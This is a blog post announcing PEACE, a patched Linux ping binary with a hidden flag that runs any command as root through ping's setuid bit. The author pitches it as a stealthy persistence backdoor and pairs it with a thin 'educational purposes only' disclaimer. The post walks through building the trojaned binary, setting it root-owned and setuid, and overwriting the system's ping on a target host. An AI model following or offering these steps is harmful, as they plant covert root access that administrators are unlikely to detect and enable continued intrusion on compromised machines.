Charlton's Blog

PEACE: Ping Executes Any Command Entered ☮

A stupid, stealthy Linux backdoor

Published: Oct 30, 2018
Category: Programming, Projects, Security
Tags: hack

Check it out on GitHub.

Welcome to PEACE! ☮

Peace is a very small patch to the well-known ping command, which leverages the utility’s setuid bit to execute arbitrary commands with root privileges. The result is a fully functional version of ping, with an additional flag (-E) used to enable command execution.

Because it’s well-known that ping requires the setuid bit to function, and because versions of ping compiled with the PEACE patchset function just as expected, it’s relatively unlikely that Peace’s added functionality will be discovered. This makes Peace useful as a persistence mechanism (to maintain administrative access to a host), or as an implant for competitive security scrimmages.

As usual, this utility is for educational purposes only, and should not be used for any malicious purpose. PEACE is licensed under BSD-3.

Building PEACE

The repository is a fork of iputils, which hosts the original source code for ping and other assorted tools.

To build PEACE from source, you’ll need to install the following dependencies:

$ apt install libcap-dev pkg-config libssl-dev python3 python3-pip ninja-build

Iputils uses Meson as their build system of choice. You can install it on your system using pip3:

$ pip3 install meson

Once these dependencies are satisfied, you can clone this repository and build Peace. After cloning, cd into the root of this repo and run the following:

$ ./configure
$ make

Meson will build and link all of the utilities in this repository, including ping. You’ll find the patched version of ping in the builddir directory.

Finally, ensure that the correct permissions and setuid bit are set on the newly produced ping binary:

$ cd builddir
$ chmod u+x ping
$ sudo chown root:root ping
$ sudo chmod +s ping # Add the setuid bit

Note that you may have to cross-compile Peace if your target is running a different architecture than the system you’re building it on.

Installation

To install PEACE, you’ll need to have some sort of administrator-level access to the target host.

After following the build instructions above, you can simply overwrite the system’s copy of ping with your special, patched version:

$ sudo mv ping `which ping`

Demo